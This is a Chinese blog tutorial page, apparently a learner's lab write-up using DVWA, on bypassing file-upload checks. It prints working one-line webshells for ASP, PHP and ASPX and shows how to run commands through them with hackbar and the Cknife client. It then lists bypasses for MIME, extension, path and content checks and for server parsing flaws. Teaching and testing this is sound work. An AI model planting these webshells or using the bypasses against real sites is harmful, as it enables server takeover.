<!DOCTYPE HTML>
<html>

<head>
	<link rel="bookmark"  type="image/x-icon"  href="/img/logo_miccall.png"/>
	<link rel="shortcut icon" href="/img/logo_miccall.png">
	
			    <title>
    NYQX
    </title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
    <link rel="stylesheet" href="/hexo/css/mic_main.css" />
    <link rel="stylesheet" href="/hexo/css/dropdownMenu.css" />
    <meta name="keywords" content="NYQX" />
    
    	<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	 
    <noscript>
        <link rel="stylesheet" href="/hexo/css/noscript.css" />
    </noscript>
    <style type="text/css">
        body:before {
          content: ' ';
          position: fixed;
          top: 0;
          background: url('/hexo/img/bg.jpg') center 0 no-repeat;
          right: 0;
          bottom: 0;
          left: 0;
          background-size: cover; 
        }
    </style>

			    
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script async type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


    <script src="/hexo/js/jquery.min.js"></script>
    <script src="/hexo/js/jquery.scrollex.min.js"></script>
    <script src="/hexo/js/jquery.scrolly.min.js"></script>
    <script src="/hexo/js/skel.min.js"></script>
    <script src="/hexo/js/util.js"></script>
    <script src="/hexo/js/main.js"></script>
	
</head>
    
		
<!-- Layouts -->



<!--  代码渲染  -->
<link rel="stylesheet" href="/css/prism_coy.css" />
<link rel="stylesheet" href="/css/typo.css" />
<!-- 文章页 -->
<body class="is-loading">
    <!-- Wrapper 外包 s-->
    <div id="wrapper" class="fade-in">
        <!-- Intro 头部显示 s -->
        <!-- Intro 头部显示 e -->
        <!-- Header 头部logo start -->
        <header id="header">
    <a href="/hexo/" class="logo">Ting</a>
</header>
        <!-- Nav 导航条 start -->
        <nav id="nav" class="special" >
            <ul class="menu links" >
			<!-- Homepage  主页  --> 
			<li >
	            <a href="/hexo/" rel="nofollow">主页</a>
	        </li>
			<!-- categories_name  分类   --> 
	        
	        <li class="active">
	            <a href="#s1">分类</a>
	                    <ul class="submenu">
	                        <li>
	                        
	                    </ul>
	        </li>
	        
	        <!-- archives  归档   --> 
	        
	        
		        <!-- Pages 自定义   -->
		        
		        <li>
		            <a href="/gallery/" title="图库">
		                图库
		            </a>
		        </li>
		        
		        <li>
		            <a href="/tag/" title="标签">
		                标签
		            </a>
		        </li>
		        


            </ul>
            <!-- icons 图标   -->
			<ul class="icons">
                    
                    <li>
                        <a title="github" href="https://github.com/miccall" target="_blank" rel="noopener">
                            <i class="icon fa fa-github"></i>
                        </a>
                    </li>
                    
                    <li>
                        <a title="500px" href="http://500px.com" target="_blank" rel="noopener">
                            <i class="icon fa fa-500px"></i>
                        </a>
                    </li>
                    
			</ul>
</nav>

        <div id="main" >
            <div class ="post_page_title_img" style="height: 25rem;background-image: url(w.jpg);background-position: center; background-repeat:no-repeat; background-size:cover;-moz-background-size:cover;overflow:hidden;" >
                <a href="#" style="padding: 4rem 4rem 2rem 4rem ;"><h2 >初见文件上传绕过</h2></a>
            </div>
            <!-- Post -->
            <div class="typo" style="padding: 3rem;">
                <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><h5 id="emsp-emsp-懒疾成癌。。。"><a href="#emsp-emsp-懒疾成癌。。。" class="headerlink" title="&emsp;&emsp;懒疾成癌。。。"></a>&emsp;&emsp;懒疾成癌。。。</h5><h5 id="emsp-emsp-有心杀贼，无力回天。。。"><a href="#emsp-emsp-有心杀贼，无力回天。。。" class="headerlink" title="&emsp;&emsp;有心杀贼，无力回天。。。"></a>&emsp;&emsp;有心杀贼，无力回天。。。</h5><p><img src="/2018/07/07/upload/1.jpg" alt="1"></p>
<hr>
<p><br></p>
<h3 id="1、一句话木马简述"><a href="#1、一句话木马简述" class="headerlink" title="1、一句话木马简述"></a>1、一句话木马简述</h3><h5 id="emsp-emsp-一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。"><a href="#emsp-emsp-一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。" class="headerlink" title="&emsp;emsp;一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。"></a>&emsp;emsp;一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。</h5><h4 id="常用一句话木马"><a href="#常用一句话木马" class="headerlink" title="常用一句话木马"></a><1>常用一句话木马</1></h4><p><strong>asp</strong>一句话木马：<br>&lt;%execute(request(“value”))%&gt;<br><strong>php</strong>一句话木马：<br>&lt;?php @eval($_POST[“value”]);?&gt;<br><strong>aspx</strong>一句话木马：<br>&lt;%@ Page Language=”Jscript”%&gt;<br>&lt;%eval(Request.Item[“value”])%&gt;</p>
<h4 id="一句话木马使用"><a href="#一句话木马使用" class="headerlink" title="一句话木马使用"></a><2>一句话木马使用</2></h4><h5 id="0-、小前言"><a href="#0-、小前言" class="headerlink" title="(0)、小前言"></a>(0)、小前言</h5><p><strong>&lt;?phpecho shell_exec($_GET[‘a’]);?&gt;</strong><br>执行a接收到的内容<br>shell_exec()：通过环境执行命令，并且将完整的输出以字符串的方式返回。<br><strong>&lt;?php @eval($_POST[‘a’]); ?&gt;</strong><br>执行a接收到的内容。<br>eval() 函数：把字符串作为PHP代码执行。<br><br></p>
<h5 id="1-、POST式"><a href="#1-、POST式" class="headerlink" title="(1)、POST式"></a>(1)、POST式</h5><p><strong>&lt;?php @eval($_POST[‘a’]); ?&gt;</strong><br>上传包含一句话木马的文件后，用hackbar在Post data里写执行的命令的参数，点Execute。  </p>
<blockquote>
<p><img src="/2018/07/07/upload/2.jpg" alt="2"></p>
</blockquote>
<hr>
<blockquote>
<p><img src="/2018/07/07/upload/3.jpg" alt="3"></p>
</blockquote>
<hr>
<blockquote>
<p><img src="/2018/07/07/upload/4.jpg" alt="4"></p>
</blockquote>
<hr>
<blockquote>
<p><img src="/2018/07/07/upload/5.jpg" alt="5"></p>
</blockquote>
<hr>
<h5 id="2-、GET式"><a href="#2-、GET式" class="headerlink" title="(2)、GET式"></a>(2)、GET式</h5><p><strong>&lt;?php echo shell_exec($_GET[‘a’]);?&gt;</strong><br>可以直接在url后面加？和传入的参数。<br><em>例：</em><a href="http://192.168.43.165/dvwa/hackable/uploads/9527.php?a=dir" target="_blank" rel="noopener">http://192.168.43.165/dvwa/hackable/uploads/9527.php?a=dir</a></p>
<blockquote>
<p><img src="/2018/07/07/upload/6.jpg" alt="6"></p>
</blockquote>
<hr>
<blockquote>
<p><img src="/2018/07/07/upload/7.jpg" alt="7"></p>
</blockquote>
<hr>
<p><br></p>
<h3 id="2、cknife"><a href="#2、cknife" class="headerlink" title="2、cknife"></a>2、cknife</h3><h4 id="小前言"><a href="#小前言" class="headerlink" title="小前言"></a><1>小前言</1></h4><p>&emsp;&emsp;它是超级强大的网站管理工，分两部分：客户端和代码。只要将那简短的一句话代码放到网站上去就可以取得网站的权限。<br>&emsp;&emsp;<strong>运行环境：</strong>安装了JRE1.7+环境的所有操作系统<br>&emsp;&emsp;<strong>主要功能有：</strong>文件管理，虚拟终端，数据库管理</p>
<h4 id="使用"><a href="#使用" class="headerlink" title="使用"></a><2>使用</2></h4><blockquote>
<p>1、往目标网站中上传包含一句话木马的文件：<br><img src="/2018/07/07/upload/8.jpg" alt="8"></p>
</blockquote>
<hr>
<blockquote>
<p>2、操作：</p>
<blockquote>
<p>①右键选择添加;<br>②在地址栏里输入已经上传的包含一句话木马的文件;<br>③地址后面的小框输入Cknife参数（根据写的一句话木马）;<br>④根据需要输入配置;<br>⑤选择脚本类型和字符编码;<br>⑥添加;<br>⑦选中url，右键相应需要的文件管理、数据库管理、终端模拟等.</p>
</blockquote>
</blockquote>
<blockquote>
<p><img src="/2018/07/07/upload/9.jpg" alt="9"></p>
</blockquote>
<hr>
<blockquote>
<p><img src="/2018/07/07/upload/10.jpg" alt="10"></p>
</blockquote>
<hr>
<p>文件管理：</p>
<blockquote>
<p><img src="/2018/07/07/upload/11.jpg" alt="11"></p>
</blockquote>
<hr>
<p>数据库管理：</p>
<blockquote>
<p><img src="/2018/07/07/upload/12.jpg" alt="12"></p>
</blockquote>
<hr>
<p>终端模拟：</p>
<blockquote>
<p><img src="/2018/07/07/upload/13.jpg" alt="13"></p>
</blockquote>
<hr>
<p><br></p>
<h3 id="3、文件上传漏洞检测绕过"><a href="#3、文件上传漏洞检测绕过" class="headerlink" title="3、文件上传漏洞检测绕过"></a>3、文件上传漏洞检测绕过</h3><h4 id="上传检测机制"><a href="#上传检测机制" class="headerlink" title="上传检测机制"></a><1>上传检测机制</1></h4><blockquote>
<p><em>1.客户端javascript检测</em><br>通常在本地检测文件的扩展名</p>
</blockquote>
<blockquote>
<p><em>2.服务端MIME类型检测</em><br>通常检测的是Content-Type内容</p>
</blockquote>
<blockquote>
<p><em>3.服务端目录路径检测</em><br>通常跟path参数相关的内容</p>
</blockquote>
<blockquote>
<p><em>4.服务端文件扩展名检测</em><br>通常检测跟文件extension相关的内容</p>
</blockquote>
<blockquote>
<p><em>5.服务端文件内容检测</em><br>检测文件内容是否合法或含有恶意代码</p>
</blockquote>
<h4 id="上传漏洞利用"><a href="#上传漏洞利用" class="headerlink" title="上传漏洞利用"></a><2>上传漏洞利用</2></h4><h5 id="1-、客户端javascript检测"><a href="#1-、客户端javascript检测" class="headerlink" title="(1)、客户端javascript检测"></a>(1)、客户端javascript检测</h5><blockquote>
<p>在客户端使用js对不合法图片进行检查<br><em>绕过：</em><br>&emsp;&emsp;方法①：禁用页面js。<br>&emsp;&emsp;方法②：先把文件改成符合条件的文件格式上传，再在抓包，修改文件的后缀名。</p>
</blockquote>
<hr>
<h5 id="2-、服务端MIME类型检测绕过"><a href="#2-、服务端MIME类型检测绕过" class="headerlink" title="(2)、服务端MIME类型检测绕过"></a>(2)、服务端MIME类型检测绕过</h5><blockquote>
<p>通过判断$_FILES[‘userfile’][‘type’] != “image/gif“来保证上传的类型为gif类型的文件。<br><em>绕过：</em><br>&emsp;&emsp;可以通过burp拦包，将原Content-Type类型该为符合要求的image/gif类型。 </p>
</blockquote>
<hr>
<h5 id="3-、服务端目录路径检测"><a href="#3-、服务端目录路径检测" class="headerlink" title="(3)、服务端目录路径检测"></a>(3)、服务端目录路径检测</h5><blockquote>
<p><em>绕过：</em><br>&emsp;&emsp;上传时提供存储路劲为image/20160704/可以通过修改为image/20160704/evil.php%00来达到截断目的。后端程序会将该路劲连接为image/20160704/evil.php%00filename.gif00截断导致最终存储的文件名为evil.php。</p>
</blockquote>
<p>(ps:phpstudy需修改配置文件php.ini中的magic_quotes_gpc = Off。)</p>
<hr>
<h5 id="4-、服务端文件扩展名检测"><a href="#4-、服务端文件扩展名检测" class="headerlink" title="(4)、服务端文件扩展名检测"></a>(4)、服务端文件扩展名检测</h5><blockquote>
<p><strong>黑名单检测：</strong>接收上传的文件做对比，如果匹配到黑名单中的后缀名，则不允许上传。<br><em>绕过：</em><br>&emsp;&emsp;方法①：后缀名大小写绕过 ,例如:将Burpsuite截获的数据包中的文件名evil.php改evil.Php。<br>&emsp;&emsp;方法②：名单列表绕过，尝试使用非黑名单内的后缀名，如php5，php7等。<br>&emsp;&emsp;方法③：特殊文件名绕过（只适用windows，将文件名改为evil.php.或evil.php (注意这里有一个空格),在windows下，不允许这样的命名，所以会将.和空格自动去掉）。<br>&emsp;&emsp;方法④：0x00截断绕过：在上传的时候，当文件系统读到0x00时，会认为文件名已经结束。例如：1.php%00.jpg，验证扩展名是.jpg，但写入的时候是1.php文件。</p>
</blockquote>
<blockquote>
<p><strong>白名单检测：</strong>接收上传的文件做扩展名匹配，匹配上白名单中的扩展名的文件才能上传。<br><em>绕过：</em><br>&emsp;&emsp;方法①：0x00截断绕过。<br>&emsp;&emsp;方法②：解析漏洞绕过。</p>
<blockquote>
<p>(1)apache解析文件名是从右到左识别扩展名，如eval.php.jpg，文件为php文件，不能解析jpg会向前解析php;<br>(2)IIS6.0 目录名包含.asp、.asa、.cer的话，则该目录下的所有文件都将按照asp解析;<br>(3)IIS6.0不解析;后面的，所以提交evil.asp;.html解析为asp类型;<br>(4)Nginx解析漏洞：将php文件换成其他可以通过的文件后缀，访问的时候在后面加上/.php，如evil.jpg/.php，evil.jpg会解析为php的格式.</p>
</blockquote>
</blockquote>
<hr>
<h5 id="5-、服务端文件内容检测"><a href="#5-、服务端文件内容检测" class="headerlink" title="(5)、服务端文件内容检测"></a>(5)、服务端文件内容检测</h5><blockquote>
<p>图像类的文件内容检测</p>
<blockquote>
<p>文件幻数检测（图片头格式检测）<br>jpg内容头value= FF D8 FF E0 00 10 4A 46 49 46<br>gif内容头value= 47 49 46 38 39 61<br>png内容头value= 89 50 4E 47</p>
</blockquote>
</blockquote>
<blockquote>
<p><em>绕过：</em><br>&emsp;&emsp;在文件头后加上一句话木马就能绕过。</p>
</blockquote>
<hr>
<h3 id="4、Burp抓包简单注明"><a href="#4、Burp抓包简单注明" class="headerlink" title="4、Burp抓包简单注明"></a>4、Burp抓包简单注明</h3><p><1></1></p>
<blockquote>
<p><img src="/2018/07/07/upload/14.jpg" alt="14"></p>
</blockquote>
<hr>
<p><2></2></p>
<blockquote>
<p><img src="/2018/07/07/upload/15.jpg" alt="15"></p>
</blockquote>
<hr>
<hr>
<p><br></p>
<h2 id="蕾姆无敌镇楼！"><a href="#蕾姆无敌镇楼！" class="headerlink" title="蕾姆无敌镇楼！"></a>蕾姆无敌镇楼！</h2><p><img src="/2018/07/07/upload/ww.jpg" alt="不是萝莉控"><br><img src="/2018/07/07/upload/www.jpg" alt="老婆"></p>

            </div>

            <!-- Post Comments -->
            
    <!-- 使用 valine -->
<div id="comment">
    <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
    <script src='//unpkg.com/valine/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#comment' ,
        notify: true,
        verify: false,
        app_id: 'your appId',
        app_key: 'your appkey',
        placeholder: 'Please leave your footprints',
        pageSize: '10',
        avatar: '',
        avatar_cdn: 'https://gravatar.loli.net/avatar/'
    });
</script>
</div>
<style>
   #comment{
        padding: 2pc;
    }
</style>


        </div>
        <!-- Copyright 版权 start -->
                <div id="copyright">
            <ul>
                <li>&copy;Powered By <a href="https://hexo.io/zh-cn/" style="border-bottom: none;">hexo</a></li>
                <li>Design: <a href="http://miccall.tech " style="border-bottom: none;">miccall</a></li>
            </ul>
            
            	<span id="busuanzi_container_site_pv">2019总访问量<span id="busuanzi_value_site_pv"></span>次</span>
			
        </div>
    </div>
</body>



 	
</html>
